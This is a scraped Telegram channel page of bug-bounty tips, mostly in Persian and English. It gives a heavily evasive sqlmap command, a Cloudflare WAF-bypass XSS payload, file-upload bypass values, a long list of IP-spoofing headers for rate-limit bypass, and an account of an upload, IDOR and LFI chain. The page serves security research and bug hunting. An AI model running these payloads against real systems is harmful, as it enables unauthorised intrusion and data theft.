Bugbounty Tips – Telegram
Bugbounty Tips
2.92K subscribers
84 photos
6 videos
13 files
92 links
research and sharing in cybersecurity
Download Telegram
Forwarded from HuntLearn
ویدئو حل CTF در یوتیوب آپلود شد!
https://www.youtube.com/watch?v=abaMumpJnqY

ممنون میشیم حمایت کنید و منتظر اخبار جدید ما باشید.
👍72👎1
XSS.PDF
1.1 MB
Xss Cheatsheet


For more join to channel (:

https://news.1rj.ru/str/rootdr_research


#Web
#BugBounty
#Book
8🙏1
Forwarded from Proxy Bar
prv8_nuclei_templates.zip
3.9 MB
Nuclei templates
*
6000 штук
🔥6🙏3
If you found any #swagger public document on your target, make sure you are testing API endpoints, there's can be some endpoints which accessible without any authentication.



For more join to channel (:

https://news.1rj.ru/str/rootdr_research


#Web
#BugBounty
👍5🤝31
Bugbounty Tips
If you found any #swagger public document on your target, make sure you are testing API endpoints, there's can be some endpoints which accessible without any authentication. For more join to channel (: https://news.1rj.ru/str/rootdr_research #Web #BugBounty
این بنده خدا میگه اگه در‌مراحل تست روی تارگتتون فایل دامیومنت swagger api رو دیدین حتما طبق داکیومنت همه اندپوینت هارو چک کنین، ممکنه برای دسترسی به اطلاعات مهم یا عملیات مهم در اندپوینت های api نیاز به احراز هویت نباشه..

For more join to channel (:

https://news.1rj.ru/str/rootdr_research


#Web
#BugBounty
4👍2
Add subdomain name in your wordlist for default credentials..

For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#bugbounty
🔥7👍1
Forwarded from Terminal
Here we are! The Compressive SQLMap Command for You!.


sqlmap -u "https://target.com" --crawl=3 --level=5 --risk=3 --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,commalesslimit,commalessmid,commentbeforeparentheses,concat2concatws,equaltolike,escapequotes,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,overlongutf8,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,varnish,versionedkeywords,versionedmorekeywords,xforwardedfor" --dbs --random-agent --batch --threads=10 --output-dir=InjectionResult --time-sec=10 --retries=3 --flush-session --fresh-queries -v 3

RedHunters
4👍2👎2🔥1
اوسینت؟ نه chatgpt کافیه 😂😂😂😑


@hoshifybot
🔥6👌2👀2👍1
یکی از فانکشنالیتی های جذاب توی باگ بانتی برای من بخش تیکتینگ مخصوصا اگر فایل آپلود داشته باشه چون خیلی چیزای مهمی ازش پیدا میشه، داستان NNN میلیون ریال بانتی بالا هم به همین شکله (:

1-آپلودر که خودش شامل چندین تست کیس میشه، چیزایی که من معمولا تست میکنم:
double extention bypass,mime type bypass,magic byte bypass,black list bypass,null byte
به عنوان مثال:
double extention:test.png.html
mime type: image/jpg
magic byte: ÿØÿî
black list: test.php5 or test.phtml
null byte: test.php5%00.jpg

روی بحث دسترسی به فایل هم تست کیس های زیر رو چک میکنم:
IDOR,Broken Access Control:
برای مثال:
IDOR: change the id or check the file with other users
Broken Access Control:
open file with ctrl+shift+n
or delete file with other users
👍3
Bugbounty Tips
یکی از فانکشنالیتی های جذاب توی باگ بانتی برای من بخش تیکتینگ مخصوصا اگر فایل آپلود داشته باشه چون خیلی چیزای مهمی ازش پیدا میشه، داستان NNN میلیون ریال بانتی بالا هم به همین شکله (: 1-آپلودر که خودش شامل چندین تست کیس میشه، چیزایی که من معمولا تست میکنم:…
مواردی که من روی گزارش بالا ارسال کردم:
1-آپلود فایل های مخرب که هیچ پروتکشنی نداشت و من میتونستم هر فایلی رو با هر محتوا و پسوندی آپلود کنم.
2-دسترسی به فایل های تیکتینگ بدون لاگین و احراز هویت، دسترسی به فایل های دیگر کاربران با آسیب پذیری IDOR
3-مهم تر از همه و زیباتر از همه: LFI که همونجور که در تصویر میبینید با نام directory mapping تایید کردن، اینجور بود که درخواست ارسال تیکت و فایل یکپارچه نبود و در 2 مرحله انجام میشد، اول فایل آپلود میشد و بعد filename پیوست تیکت میشد، که در اینجا به دلیل عدم پاکسازی و مکانیزم امنیتی من با تغییر filename به هر فایل حساس سرور یا سورس کد سامانه یا بکاپ های دیتابیس(یه بروت فورس ساده برای اسم فایل ها و کانفیگ ها )میتونستم به فایل های حساس سرور دسترسی داشته باشم که chain شده بود به آسیب پذیری های بالا و هرکسی بدون لاگین میتونست فایل های حساس سرور رو از طریق نوع دولوپ سامانه دانلود کنه.
امیدوارم این موارد براتون مفید بوده باشه.
این تست کیس ها هم جذابه:
https://idego-group.com/blog/2022/02/08/file-upload-vulnerabilities
موارد زیادی هست روی بحث Fileupload,broken access control,IDOR، با ریسرچ و حل کردن لابراتوار های مختلف میشه یادشون گرفت.
For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#bugbounty
👍63
Forwarded from HuntLearn (Iraji Moghaddam)
پلتفرم آموزشی هانت‌لرن قصد دارد میزبان کنفرانس‌های سایبری ماهانه باشد! در این رویدادها، هکرها هر ماه به صورت آنلاین گرد هم می‌آیند تا دستاوردها، تحقیقات، اخبار و موضوعات مهم یک ماه اخیر را با یکدیگر به اشتراک بگذارند. یک گردهمایی مهیج و کاملاً مفید برای همه، که حضور در آن برای همگان رایگان و آزاده. همچنین، هر کسی میتونه ارائه خودش رو در این کنفرانس‌ها داشته باشه پس اگه حس میکنید موضوع جذابی برای ارائه دارید، موضوع‌های خودتون رو جمع کنید و آماده ارائه دادن بشید!
منتظر خبرهای بیشتر از ما در این باره باشید!
4🔥2
CAPTCHA Bypass Methods



For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#BugBounty
👍42🔥2
Forwarded from sn0whacks
🔥پیلود XSS برای دور زدن CloudFlare WAF:

‘>alert(154)</noscript><noscript/154=’;;;;;;;

@sn0whacks
#bugbountyTips
👍121
خبرهاییه
🤝3
Forwarded from 🔴 خبر فوری | اخبار لحظه ای | اخبار جنگ (Dirin)
This media is not supported in your browser
VIEW IN TELEGRAM
آسمان تل آویو هم اکنون

✔️ @khabarforieh
👍12🔥1
Use Akamai-Client-Ip instead of XFF to override YOUR IP to 127.0.0.1

For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#bugbounty
🔥8
Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1


For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#bugbounty
7🔥2
this will help you to Bypass csp
http://cspbypass.com/


For more join to channel (:

https://news.1rj.ru/str/rootdr_research

#Web
#Payloads
#bugbounty
بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه
پ.ن: ASIS خشن مینوازد😂😂